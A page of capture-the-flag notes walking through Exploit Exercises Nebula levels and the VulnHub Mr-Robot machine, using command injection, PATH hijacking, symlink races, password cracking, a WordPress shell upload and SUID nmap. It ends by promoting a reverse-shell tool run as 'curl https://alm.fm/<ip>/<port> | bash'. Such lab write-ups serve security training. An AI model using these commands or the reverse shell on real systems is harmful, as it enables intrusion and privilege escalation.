Nebula

https://exploit-exercises.com/nebula/

level00

level00@nebula:~$ find / -perm -4000 2>/dev/null | grep -i flag00
/bin/.../flag00
/rofs/bin/.../flag00
level00@nebula:~$ /bin/.../flag00
Congrats, now run getflag to get your flag!
flag00@nebula:~$ getflag
You have successfully executed getflag on a target account

---

level01

level01@nebula:~$ ls
echo
level01@nebula:~$ cat echo
#!/bin/bash

/bin/bash
level01@nebula:~$ echo $PATH
/home/level01:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games
level01@nebula:~$ /home/flag01/flag01
flag01@nebula:~$ getflag
You have successfully executed getflag on a target account

---

level02

level02@nebula:~$ /home/flag02/flag02
about to call system("/bin/echo level02 is cool")
level02 is cool
level02@nebula:~$ echo $USER
level02
level02@nebula:~$ USER="level02;/bin/bash;echo "
level02@nebula:~$ export USER
level02@nebula:~$ echo $USER
level02;/bin/bash;echo
level02@nebula:~$ /home/flag02/flag02
about to call system("/bin/echo level02;/bin/bash;echo  is cool")
level02
flag02@nebula:~$ getflag
You have successfully executed getflag on a target account
flag02@nebula:~$ exit
exit
is cool

---

level03

level03@nebula:/home/flag03$ ls -alh
total 5.5K
drwxr-x--- 1 flag03 level03   60 2011-11-20 20:39 .
drwxr-xr-x 1 root   root     140 2012-08-27 07:18 ..
-rw-r--r-- 1 flag03 flag03   220 2011-05-18 02:54 .bash_logout
-rw-r--r-- 1 flag03 flag03  3.3K 2011-05-18 02:54 .bashrc
-rw-r--r-- 1 flag03 flag03   675 2011-05-18 02:54 .profile
drwxrwxrwx 1 flag03 flag03    60 2017-01-18 02:27 writable.d
-rwxr-xr-x 1 flag03 flag03    98 2011-11-20 21:22 writable.sh
level03@nebula:/home/flag03$ cat writable.sh
#!/bin/sh

for i in /home/flag03/writable.d/* ; do
        (ulimit -t 5; bash -x "$i")
        rm -f "$i"
done

level03@nebula:/home/flag03$ cd writable.d/
level03@nebula:/home/flag03/writable.d$ cat getflag.sh
#!/bin/bash

/bin/getflag > /tmp/getflag
level03@nebula:/home/flag03/writable.d$ cat /tmp/getflag
You have successfully executed getflag on a target account

---

level04

level04@nebula:~$ /home/flag04/flag04 /home/flag04/token
You may not access '/home/flag04/token'
level04@nebula:~$ ln -s /home/flag04/token thet
level04@nebula:~$ /home/flag04/flag04 thet
06508b5e-8909-4f38-b630-fdb148a848a2

---

level05

level05@nebula:~$ cd /home/flag05/
level05@nebula:/home/flag05$ ls -alh
total 9.0K
drwxr-x--- 1 flag05 level05   80 2017-01-18 02:34 .
drwxr-xr-x 1 root   root     200 2012-08-27 07:18 ..
drwxr-xr-x 2 flag05 flag05    42 2011-11-20 20:13 .backup
-rw------- 1 flag05 flag05    14 2017-01-18 02:34 .bash_history
-rw-r--r-- 1 flag05 flag05   220 2011-05-18 02:54 .bash_logout
-rw-r--r-- 1 flag05 flag05  3.3K 2011-05-18 02:54 .bashrc
drwx------ 2 flag05 flag05    60 2017-01-18 02:34 .cache
-rw-r--r-- 1 flag05 flag05   675 2011-05-18 02:54 .profile
drwx------ 2 flag05 flag05    70 2011-11-20 20:13 .ssh
level05@nebula:/home/flag05$ cd .backup/
level05@nebula:/home/flag05/.backup$ ls -alh
total 2.0K
drwxr-xr-x 2 flag05 flag05    42 2011-11-20 20:13 .
drwxr-x--- 1 flag05 level05   80 2017-01-18 02:34 ..
-rw-rw-r-- 1 flag05 flag05  1.8K 2011-11-20 20:13 backup-19072011.tgz
level05@nebula:/home/flag05/.backup$ cp backup-19072011.tgz ~
level05@nebula:/home/flag05/.backup$ cd !$
cd ~
level05@nebula:~$ ls
backup-19072011.tgz
level05@nebula:~$ gunzip backup-19072011.tgz
level05@nebula:~$ ls
backup-19072011.tar
level05@nebula:~$ tar xvf backup-19072011.tar
.ssh/
.ssh/id_rsa.pub
.ssh/id_rsa
.ssh/authorized_keys
level05@nebula:~$ ssh flag05@localhost -i .ssh/id_rsa
The authenticity of host 'localhost (127.0.0.1)' can't be established.
ECDSA key fingerprint is ea:8d:09:1d:f1:69:e6:1e:55:c7:ec:e9:76:a1:37:f0.
Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added 'localhost' (ECDSA) to the list of known hosts.

      _   __     __          __
     / | / /__  / /_  __  __/ /___ _
    /  |/ / _ \/ __ \/ / / / / __ `/
   / /|  /  __/ /_/ / /_/ / / /_/ /
  /_/ |_/\___/_.___/\__,_/_/\__,_/
...snip...
flag05@nebula:~$ getflag
You have successfully executed getflag on a target account

---

level06

level06@nebula:~$ cat /etc/passwd | grep flag06
flag06:ueqwOCnSGdsuM:993:993::/home/flag06:/bin/sh
level06@nebula:~$ exit
logout
Connection to nebula closed.
> john passwd
...snip...
> john --show passwd 
flag06:hello:993:993::/home/flag06:/bin/sh

1 password hash cracked, 0 left
>  ssh flag06@nebula

      _   __     __          __
     / | / /__  / /_  __  __/ /___ _
    /  |/ / _ \/ __ \/ / / / / __ `/
   / /|  /  __/ /_/ / /_/ / / /_/ /
  /_/ |_/\___/_.___/\__,_/_/\__,_/
...snip...
flag06@nebula's password:
...snip...
flag06@nebula:~$ getflag
You have successfully executed getflag on a target account

---

level07

> curl "http://nebula:7007/index.cgi?Host=%60/bin/getflag>/tmp/level07flag%60"
Usage: ping [-LRUbdfnqrvVaAD] [-c count] [-i interval] [-w deadline]
            [-p pattern] [-s packetsize] [-t ttl] [-I interface]
            [-M pmtudisc-hint] [-m mark] [-S sndbuf]
            [-T tstamp-options] [-Q tos] [hop1 ...] destination%
> ssh level07@nebula

      _   __     __          __
     / | / /__  / /_  __  __/ /___ _
    /  |/ / _ \/ __ \/ / / / / __ `/
   / /|  /  __/ /_/ / /_/ / / /_/ /
  /_/ |_/\___/_.___/\__,_/_/\__,_/
...snip...
level07@nebula's password:
...snip...
level07@nebula:~$ cat /tmp/level07flag
You have successfully executed getflag on a target account

---

level08

Load pcap in Wireshark.

Linux 2.6.38-8-generic-pae (::ffff:10.1.1.2) (pts/10)

..wwwbugs login: l.le.ev.ve.el.l8.8
..
Password: backdoor...00Rm8.ate
.
..
Login incorrect
wwwbugs login: 

Password is not 'backdoor', the dots are backspaces.

backdoor becomes:
backd00Rm8
backd00Rm8 becomes:
backd00Rmate

---

level09

level09@nebula:~$ cat test
[email {${system($use_me)}}]

level09@nebula:~$ /home/flag09/flag09 test "/bin/getflag"
You have successfully executed getflag on a target account
PHP Notice:  Undefined variable: You have successfully executed getflag on a target account in /home/flag09/flag09.php(15) : regexp code on line 1

level09@nebula:~$

---

level10

level10@nebula:~$ cat nc.sh
#!/bin/bash

while true
do
        nc -l 18211 &
done
level10@nebula:~$ cat ln1.sh
#!/bin/bash

while true
do
        ln -sf /home/flag10/token /home/level10/token &
done
level10@nebula:~$ cat ln2.sh
#!/bin/bash

while true
do
        ln -sf /home/level10/x /home/level10/token &
done
level10@nebula:~$ cat run.sh
#!/bin/bash

while true
do
        /home/flag10/flag10 /home/level10/token 127.0.0.1 &
done
level10@nebula:~$ cat x
x

* Run all bash scripts and then nc.sh (race condition)

level10@nebula:~$ ./nc.sh 
nc: nc: nc: nc: nc: nc: nc: nc: nc: nc: nc: nc:
nc: Address already in use
nc: .oO Oo.
x
Address already in use
Address already in use
Address already in use
Address already in use
nc: nc: nc: Address already in use
Address already in use
Address already in use
Address already in use
nc: Address already in use
nc: Address already in use
Address already in use
.oO Oo.
x
nc: Address already in use
Address already in use
Address already in use
Address already in use
Address already in use
nc: nc: nc: Address already in use
nc: Address already in use
nc: Address already in use
Address already in use
Address already in use
nc: nc: nc: Address already in use
nc: .oO Oo.
615a2ce1-b2b5-4c76-8eed-8aa5c4015c27

---

level11

level11@nebula:~$ PATH=/home/level11:$PATH
level11@nebula:~$ export PATH
level11@nebula:~$ echo -e "Content-Length: 1\nDDD" | /home/flag11/flag11
getflag is executing on a non-flag account, this doesn't count (BUG)

TBC...

Mr-Robot 1 (VulnHub)

https://www.vulnhub.com/entry/mr-robot-1,151/
---
https://192.168.1.240/robots.txt


User-agent: *
fsocity.dic
key-1-of-3.txt
---
https://192.168.1.240/key-1-of-3.txt
073403c8a58a1f80d943455fb30724b9
---
cat fsocity.dic | sort | uniq -c | sort -hr | tail -15
     75 002
     75 001
     75 000080
     75 000000
     75 000
      1 uHack
      1 psychedelic
      1 imhack
      1 iamalearn
      1 ER28-0652
      1 c3fcd3d76192e4007dfb496cca67e13b (another key?)
      1 ABCDEFGHIJKLMNOPQRSTUVWXYZ
      1 abcdefghijklmnopq
      1 abcdEfghijklmnop
      1 abcdefghijklmno
---
http://192.168.1.240/wp-login.php

elliot
ER28-0652
---
use exploit/unix/webapp/wp_admin_shell_upload

python -c 'import pty;pty.spawn("/bin/bash")'
su robot (Google md5 value)
---
robot@linux:~$ ls -alh
ls -alh
total 16K
drwxr-xr-x 2 root  root  4.0K Nov 13  2015 .
drwxr-xr-x 3 root  root  4.0K Nov 13  2015 ..
-r-------- 1 robot robot   33 Nov 13  2015 key-2-of-3.txt
-rw-r--r-- 1 robot robot   39 Nov 13  2015 password.raw-md5
---
robot@linux:~$ cat key-2-of-3.txt
cat key-2-of-3.txt
822c73956184f694993bede3eb39f95
---
find / -perm +6000 -type f -ls 2>/dev/null
 15068   44 -rwsr-xr-x   1 root     root        44168 May  7  2014 /bin/ping
 15093   68 -rwsr-xr-x   1 root     root        69120 Feb 12  2015 /bin/umount
 15060   96 -rwsr-xr-x   1 root     root        94792 Feb 12  2015 /bin/mount
 15069   44 -rwsr-xr-x   1 root     root        44680 May  7  2014 /bin/ping6
 15085   40 -rwsr-xr-x   1 root     root        36936 Feb 17  2014 /bin/su
 36202   16 -rwxr-sr-x   3 root     mail        14592 Dec  3  2012 /usr/bin/mail-touchlock
 36231   48 -rwsr-xr-x   1 root     root        47032 Feb 17  2014 /usr/bin/passwd
 36216   32 -rwsr-xr-x   1 root     root        32464 Feb 17  2014 /usr/bin/newgrp
 36298  412 -rwxr-sr-x   1 root     utmp       421768 Nov  7  2013 /usr/bin/screen
 36202   16 -rwxr-sr-x   3 root     mail        14592 Dec  3  2012 /usr/bin/mail-unlock
 36202   16 -rwxr-sr-x   3 root     mail        14592 Dec  3  2012 /usr/bin/mail-lock
 36041   44 -rwsr-xr-x   1 root     root        41336 Feb 17  2014 /usr/bin/chsh
 36056   36 -rwxr-sr-x   1 root     crontab     35984 Feb  9  2013 /usr/bin/crontab
 36038   48 -rwsr-xr-x   1 root     root        46424 Feb 17  2014 /usr/bin/chfn
 36034   56 -rwxr-sr-x   1 root     shadow      54968 Feb 17  2014 /usr/bin/chage
 36148   68 -rwsr-xr-x   1 root     root        68152 Feb 17  2014 /usr/bin/gpasswd
 36112   24 -rwxr-sr-x   1 root     shadow      23360 Feb 17  2014 /usr/bin/expiry
 36080   16 -rwxr-sr-x   1 root     mail        14856 Dec  7  2013 /usr/bin/dotlockfile
 36349  152 -rwsr-xr-x   1 root     root       155008 Mar 12  2015 /usr/bin/sudo
 36337  280 -rwxr-sr-x   1 root     ssh        284784 May 12  2014 /usr/bin/ssh-agent
 36388   20 -rwxr-sr-x   1 root     tty         19024 Feb 12  2015 /usr/bin/wall
 34835  496 -rwsr-xr-x   1 root     root       504736 Nov 13  2015 /usr/local/bin/nmap
...
---
robot@linux:~$ nmap -iL /root/key-3-of-3.txt localhost
nmap -iL /root/key-3-of-3.txt localhost

Starting nmap 3.81 ( http://www.insecure.org/nmap/ ) at 2016-09-11 11:25 UTC
Failed to resolve given hostname/IP: 04787ddef27c3dee1ee161b21670b4e4.
Note that you can't use '/mask' AND '[1-4,7,100-]' style IP ranges
WARNING: No targets were specified, so 0 hosts scanned.
Nmap finished: 0 IP addresses (0 hosts up) scanned in 0.314 seconds
robot@linux:~$

alm.fm

I have created a tool which will try and establish a reverse shell to a nominated IP address and port using the following binaries (in order).

  1. bash
  2. nc
  3. ruby
  4. php
  5. python
To use this tool run the following on the target host:
curl https://alm.fm/<your-ip>/<your-port> | bash

On your machine make sure you have something like this running:
nc -l -p <your-port>
This should save you some time when performing engagements and you have a web shell or similar. It's worth noting that the target will attempt to make a TCP connection outbound, which may be picked up.

Be aware that curl XXXX | bash is seen as bad practice these days (when was it ever a good idea?), but in this case it's convenient. You can grab the PHP code here.